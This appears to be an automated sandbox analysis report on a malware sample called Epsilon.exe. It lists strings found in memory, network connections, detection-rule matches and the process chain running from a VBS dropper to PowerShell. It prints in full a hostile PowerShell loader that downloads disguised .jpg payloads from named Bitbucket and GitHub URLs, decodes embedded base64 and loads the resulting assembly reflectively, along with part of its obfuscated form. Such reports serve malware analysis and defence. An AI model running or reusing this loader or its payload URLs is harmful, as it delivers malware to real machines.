        Source: powershell.exe, 00000005.00000002.2430048549.0000027B39EBC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175839410.000001A1DC001000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: powershell.exe, 00000007.00000002.2175839410.000001A1DC228000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
        Source: powershell.exe, 00000007.00000002.2175839410.000001A1DC3FB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://admin.atlassian.com
        Source: powershell.exe, 00000005.00000002.2430048549.0000027B39E95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2430048549.0000027B39E57000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175839410.000001A1DC001000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
        Source: powershell.exe, 00000007.00000002.2175839410.000001A1DC3FB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.bitbucket.org
        Source: powershell.exe, 00000007.00000002.2175839410.000001A1DC3FB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://atlassianblog.wpengine.com/wp-json/wp/v2/posts?tags=11972&context=embed&per_page=6&orderby=d
        Source: powershell.exe, 00000007.00000002.2175839410.000001A1DC228000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aui-cdn.atlassian.com/
        Source: powershell.exe, 00000007.00000002.2175839410.000001A1DC228000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net
        Source: powershell.exe, 00000007.00000002.2175839410.000001A1DC228000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net
        Source: powershell.exe, 00000007.00000002.2175839410.000001A1DC228000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net
        Source: powershell.exe, 00000007.00000002.2175839410.000001A1DC228000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net
        Source: powershell.exe, 00000007.00000002.2175839410.000001A1DC228000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
        Source: powershell.exe, 00000007.00000002.2175839410.000001A1DC228000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/;
        Source: powershell.exe, 00000007.00000002.2175839410.000001A1DC3FB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/c9b3998323c0/dist/webpack
        Source: powershell.exe, 00000007.00000002.2175839410.000001A1DC3FB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/c9b3998323c0/jsi18n/en/dj
        Source: powershell.exe, 00000007.00000002.2175839410.000001A1DC228000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/
        Source: powershell.exe, 00000007.00000002.2175839410.000001A1DC3FB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bitbucket.org
        Source: powershell.exe, 00000007.00000002.2175839410.000001A1DC3FB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bitbucket.org/gateway/api/emoji/
        Source: powershell.exe, 00000005.00000002.2430048549.0000027B3A3E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2466653987.0000027B523E0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2168306779.000001A1DA390000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175839410.000001A1DC001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2170048890.000001A1DA670000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2168503153.000001A1DA419000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2168306779.000001A1DA3B0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2170230937.000001A1DA684000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175839410.000001A1DC228000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bitbucket.org/jhgfhhkjeedefdf/mnbvgjdg/downloads/test.jpg?537611
        Source: powershell.exe, 00000007.00000002.2175839410.000001A1DC3FB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bitbucket.status.atlassian.com/
        Source: powershell.exe, 00000007.00000002.2175839410.000001A1DC228000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.cookielaw.org/
        Source: powershell.exe, 00000007.00000002.2175839410.000001A1DC228000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://dz8aopenkvv6s.cloudfront.net
        Source: powershell.exe, 00000007.00000002.2175839410.000001A1DC228000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
        Source: powershell.exe, 00000007.00000002.2175839410.000001A1DC3FB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://id.atlassian.com/login
        Source: powershell.exe, 00000007.00000002.2175839410.000001A1DC3FB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://id.atlassian.com/logout
        Source: powershell.exe, 00000007.00000002.2175839410.000001A1DC3FB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://id.atlassian.com/manage-profile/
        Source: powershell.exe, 00000007.00000002.2175839410.000001A1DC3FB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://preferences.atlassian.com
        Source: powershell.exe, 00000007.00000002.2175839410.000001A1DC228000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://raw.githubusercontent.com
        Source: powershell.exe, 00000005.00000002.2430048549.0000027B3A3E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2466653987.0000027B523E0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2168306779.000001A1DA390000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175839410.000001A1DC001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2170048890.000001A1DA670000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2168503153.000001A1DA419000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2168306779.000001A1DA3B0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2170230937.000001A1DA684000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175839410.000001A1DC228000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://raw.githubusercontent.com/gmedusa135/nano/refs/heads/main/new_img123.jpg
        Source: powershell.exe, 00000007.00000002.2175839410.000001A1DC228000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
        Source: powershell.exe, 00000007.00000002.2175839410.000001A1DC228000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
        Source: powershell.exe, 00000007.00000002.2175839410.000001A1DC228000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website
        Source: powershell.exe, 00000007.00000002.2175839410.000001A1DC3FB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.atlassian.com/try/cloud/signup?bundle=bitbucket
        Source: unknown | Network traffic detected: HTTP traffic on port 49705 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 49704 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49705
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49704
        Source: unknown | HTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.5:49704 version: TLS 1.2
        Source: unknown | HTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.5:49705 version: TLS 1.2

        System Summary

        Source: Process Memory Space: powershell.exe PID: 7504, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: Process Memory Space: powershell.exe PID: 7660, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Network Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{093FF999-1EA0-4079-9525-9614C3504B74}
        Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO$GU$d$$u$FM$ZQBy$HY$aQBj$GU$U$Bv$Gk$bgB0$E0$YQBu$GE$ZwBl$HI$XQ$6$Do$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$$g$D0$I$Bb$E4$ZQB0$C4$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$BU$Hk$c$Bl$F0$Og$6$FQ$b$Bz$DE$Mg$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgB1$G4$YwB0$Gk$bwBu$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$B7$C$$c$Bh$HI$YQBt$C$$K$Bb$HM$d$By$Gk$bgBn$Fs$XQBd$CQ$b$Bp$G4$awBz$Ck$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$B3$GU$YgBD$Gw$aQBl$G4$d$$g$D0$I$BO$GU$dw$t$E8$YgBq$GU$YwB0$C$$UwB5$HM$d$Bl$G0$LgBO$GU$d$$u$Fc$ZQBi$EM$b$Bp$GU$bgB0$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$C$$PQ$g$Ec$ZQB0$C0$UgBh$G4$Z$Bv$G0$I$$t$Ek$bgBw$HU$d$BP$GI$agBl$GM$d$$g$CQ$b$Bp$G4$awBz$C$$LQBD$G8$dQBu$HQ$I$$k$Gw$aQBu$Gs$cw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgBv$HI$ZQBh$GM$a$$g$Cg$J$Bs$Gk$bgBr$C$$aQBu$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$Ck$I$B7$C$$d$By$Hk$I$B7$C$$cgBl$HQ$dQBy$G4$I$$k$Hc$ZQBi$EM$b$Bp$GU$bgB0$C4$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$K$$k$Gw$aQBu$Gs$KQ$g$H0$I$Bj$GE$d$Bj$Gg$I$B7$C$$YwBv$G4$d$Bp$G4$dQBl$C$$fQ$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$By$GU$d$B1$HI$bg$g$CQ$bgB1$Gw$b$$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gw$aQBu$Gs$cw$g$D0$I$B$$Cg$JwBo$HQ$d$Bw$HM$Og$v$C8$YgBp$HQ$YgB1$GM$awBl$HQ$LgBv$HI$Zw$v$Go$a$Bn$GY$a$Bo$Gs$agBl$GU$Z$Bl$GY$Z$Bm$C8$bQBu$GI$dgBn$Go$Z$Bn$C8$Z$Bv$Hc$bgBs$G8$YQBk$HM$LwB0$GU$cwB0$C4$agBw$Gc$Pw$1$DM$Nw$2$DE$MQ$n$Cw$I$$n$Gg$d$B0$H$$cw$6$C8$LwBy$GE$dw$u$Gc$aQB0$Gg$dQBi$HU$cwBl$HI$YwBv$G4$d$Bl$G4$d$$u$GM$bwBt$C8$ZwBt$GU$Z$B1$HM$YQ$x$DM$NQ$v$G4$YQBu$G8$LwBy$GU$ZgBz$C8$a$Bl$GE$Z$Bz$C8$bQBh$Gk$bg$v$G4$ZQB3$F8$aQBt$Gc$MQ$y$DM$LgBq$H$$Zw$n$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gk$bQBh$Gc$ZQBC$Hk$d$Bl$HM$I$$9$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$H
M$I$$k$Gw$aQBu$Gs$cw$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$Gk$Zg$g$Cg$J$Bp$G0$YQBn$GU$QgB5$HQ$ZQBz$C$$LQBu$GU$I$$k$G4$dQBs$Gw$KQ$g$Hs$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C$$PQ$g$Fs$UwB5$HM$d$Bl$G0$LgBU$GU$e$B0$C4$RQBu$GM$bwBk$Gk$bgBn$F0$Og$6$FU$V$BG$Dg$LgBH$GU$d$BT$HQ$cgBp$G4$Zw$o$CQ$aQBt$GE$ZwBl$EI$eQB0$GU$cw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$g$D0$I$$n$Dw$P$BC$EE$UwBF$DY$N$Bf$FM$V$BB$FI$V$$+$D4$Jw$7$C$$J$Bl$G4$Z$BG$Gw$YQBn$C$$PQ$g$Cc$P$$8$EI$QQBT$EU$Ng$0$F8$RQBO$EQ$Pg$+$Cc$Ow$g$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$D0$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C4$SQBu$GQ$ZQB4$E8$Zg$o$CQ$cwB0$GE$cgB0$EY$b$Bh$Gc$KQ$7$C$$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$ZQBu$GQ$SQBu$GQ$ZQB4$C$$PQ$g$CQ$aQBt$GE$ZwBl$FQ$ZQB4$HQ$LgBJ$G4$Z$Bl$Hg$TwBm$Cg$J$Bl$G4$Z$BG$Gw$YQBn$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$Bp$GY$I$$o$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$C0$ZwBl$C$$M$$g$C0$YQBu$GQ$I$$k$GU$bgBk$Ek$bgBk$GU$e$$g$C0$ZwB0$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$Ck$I$B7$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$C$$Kw$9$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$u$Ew$ZQBu$Gc$d$Bo$D
        Source: C:\Users\user\Desktop\Epsilon.exe | Code function: 0_2_00007FF737822C54 GetVersion,GetModuleHandleW,GetProcAddress,ExitWindowsEx,CloseHandle,0_2_00007FF737822C54
        Source: C:\Users\user\Desktop\Epsilon.exe | Code function: 0_2_00007FF737821C0C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,0_2_00007FF737821C0C
        Source: C:\Users\user\Desktop\Epsilon.exe | Code function: 0_2_00007FF737822DB4
        Source: C:\Users\user\Desktop\Epsilon.exe | Code function: 0_2_00007FF737826CA4
        Source: C:\Users\user\Desktop\Epsilon.exe | Code function: 0_2_00007FF7378266C4
        Source: C:\Users\user\Desktop\Epsilon.exe | Code function: 0_2_00007FF7378240C4
        Source: C:\Users\user\Desktop\Epsilon.exe | Code function: 0_2_00007FF737821D28
        Source: C:\Users\user\Desktop\Epsilon.exe | Code function: 0_2_00007FF737825D90
        Source: C:\Users\user\Desktop\Epsilon.exe | Code function: 0_2_00007FF737821C0C
        Source: C:\Users\user\Desktop\Epsilon.exe | Code function: 0_2_00007FF737823530
        Source: Epsilon.exe | Static PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, Windows 2000/XP setup, 6568 bytes, 1 file, at 0x2c +A "677174b841ee7.vbs", ID 1209, number 1, 1 datablock, 0x1503 compression
        Source: Epsilon.exe | Static PE information: Resource name: RT_RCDATA type: GLS_BINARY_LSB_FIRST
        Source: Epsilon.exe | Binary or memory string: OriginalFilename vs Epsilon.exe
        Source: Epsilon.exe, 00000000.00000002.2021563395.00007FF73782E000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs Epsilon.exe
        Source: Epsilon.exe | Binary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs Epsilon.exe
        Source: C:\Windows\System32\wscript.exe | Process created: Commandline size = 5356
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: Commandline size = 2010
        Source: Process Memory Space: powershell.exe PID: 7504, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: Process Memory Space: powershell.exe PID: 7660, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: classification engine | Classification label: mal100.spre.expl.evad.winEXE@12/8@2/2
        Source: C:\Users\user\Desktop\Epsilon.exe | Code function: 0_2_00007FF737826CA4 GetCurrentDirectoryA,SetCurrentDirectoryA,GetDiskFreeSpaceA,MulDiv,GetVolumeInformationA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,0_2_00007FF737826CA4
        Source: C:\Users\user\Desktop\Epsilon.exe | Code function: 0_2_00007FF737821C0C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,0_2_00007FF737821C0C
        Source: C:\Users\user\Desktop\Epsilon.exe | Code function: 0_2_00007FF737826CA4 GetCurrentDirectoryA,SetCurrentDirectoryA,GetDiskFreeSpaceA,MulDiv,GetVolumeInformationA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,0_2_00007FF737826CA4
        Source: C:\Users\user\Desktop\Epsilon.exe | Code function: 0_2_00007FF737822DB4 memset,memset,CreateEventA,SetEvent,CreateMutexA,GetLastError,CloseHandle,FindResourceExA,LoadResource,#17,0_2_00007FF737822DB4
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7512:120:WilError_03
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7352:120:WilError_03
        Source: C:\Users\user\Desktop\Epsilon.exe | File created: C:\Users\user\AppData\Local\Temp\IXP000.TMP
        Source: C:\Users\user\Desktop\Epsilon.exe | Process created: C:\Windows\System32\cmd.exe cmd.exe /c 677174b841ee7.vbs
        Source: Epsilon.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Windows\System32\cmd.exe | File read: C:\Users\user\Desktop\desktop.ini
        Source: C:\Users\user\Desktop\Epsilon.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: Epsilon.exe | ReversingLabs: Detection: 36%
        Source: unknown | Process created: C:\Users\user\Desktop\Epsilon.exe "C:\Users\user\Desktop\Epsilon.exe"
        Source: C:\Users\user\Desktop\Epsilon.exe | Process created: C:\Windows\System32\cmd.exe cmd.exe /c 677174b841ee7.vbs
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\677174b841ee7.vbs"
        Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = '…'"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/jhgfhhkjeedefdf/mnbvgjdg/downloads/test.jpg?537611', 'https://raw.githubusercontent.com/gmedusa135/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.hckSkpo/sdaolnwod/rwqewqfqwf/qretretr/gro.tekcubtib', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec
        Source: C:\Users\user\Desktop\Epsilon.exe | Section loaded: cabinet.dll
        Source: C:\Users\user\Desktop\Epsilon.exe | Section loaded: version.dll
        Source: C:\Users\user\Desktop\Epsilon.exe | Section loaded: feclient.dll
        Source: C:\Users\user\Desktop\Epsilon.exe | Section loaded: iertutil.dll
        Source: C:\Users\user\Desktop\Epsilon.exe | Section loaded: uxtheme.dll
        Source: C:\Users\user\Desktop\Epsilon.exe | Section loaded: kernel.appcore.dll
        Source: C:\Users\user\Desktop\Epsilon.exe | Section loaded: textinputframework.dll
        Source: C:\Users\user\Desktop\Epsilon.exe | Section loaded: coreuicomponents.dll
        Source: C:\Users\user\Desktop\Epsilon.exe | Section loaded: coremessaging.dll
        Source: C:\Users\user\Desktop\Epsilon.exe | Section loaded: ntmarta.dll
        Source: C:\Users\user\Desktop\Epsilon.exe | Section loaded: wintypes.dll
        Source: C:\Users\user\Desktop\Epsilon.exe | Section loaded: wintypes.dll
        Source: C:\Users\user\Desktop\Epsilon.exe | Section loaded: wintypes.dll
        Source: C:\Users\user\Desktop\Epsilon.exe | Section loaded: textshaping.dll
        Source: C:\Users\user\Desktop\Epsilon.exe | Section loaded: advpack.dll
        Source: C:\Windows\System32\cmd.exe | Section loaded: cmdext.dll
        Source: C:\Windows\System32\cmd.exe | Section loaded: windows.storage.dll
        Source: C:\Windows\System32\cmd.exe | Section loaded: wldp.dll
        Source: C:\Windows\System32\cmd.exe | Section loaded: kernel.appcore.dll
        Source: C:\Windows\System32\cmd.exe | Section loaded: uxtheme.dll
        Source: C:\Windows\System32\cmd.exe | Section loaded: propsys.dll
        Source: C:\Windows\System32\cmd.exe | Section loaded: profapi.dll
        Source: C:\Windows\System32\cmd.exe | Section loaded: edputil.dll
        Source: C:\Windows\System32\cmd.exe | Section loaded: urlmon.dll
        Source: C:\Windows\System32\cmd.exe | Section loaded: iertutil.dll
        Source: C:\Windows\System32\cmd.exe | Section loaded: srvcli.dll
        Source: C:\Windows\System32\cmd.exe | Section loaded: netutils.dll
        Source: C:\Windows\System32\cmd.exe | Section loaded: windows.staterepositoryps.dll
        Source: C:\Windows\System32\cmd.exe | Section loaded: policymanager.dll
        Source: C:\Windows\System32\cmd.exe | Section loaded: msvcp110_win.dll
        Source: C:\Windows\System32\cmd.exe | Section loaded: sspicli.dll
        Source: C:\Windows\System32\cmd.exe | Section loaded: wintypes.dll
        Source: C:\Windows\System32\cmd.exe | Section loaded: appresolver.dll
        Source: C:\Windows\System32\cmd.exe | Section loaded: bcp47langs.dll
        Source: C:\Windows\System32\cmd.exe | Section loaded: slc.dll
        Source: C:\Windows\System32\cmd.exe | Section loaded: userenv.dll
        Source: C:\Windows\System32\cmd.exe | Section loaded: sppc.dll
        Source: C:\Windows\System32\cmd.exe | Section loaded: onecorecommonproxystub.dll
        Source: C:\Windows\System32\cmd.exe | Section loaded: onecoreuapcommonproxystub.dll
        Source: C:\Windows\System32\cmd.exe | Section loaded: pcacli.dll
        Source: C:\Windows\System32\cmd.exe | Section loaded: mpr.dll
        Source: C:\Windows\System32\cmd.exe | Section loaded: sfc_os.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
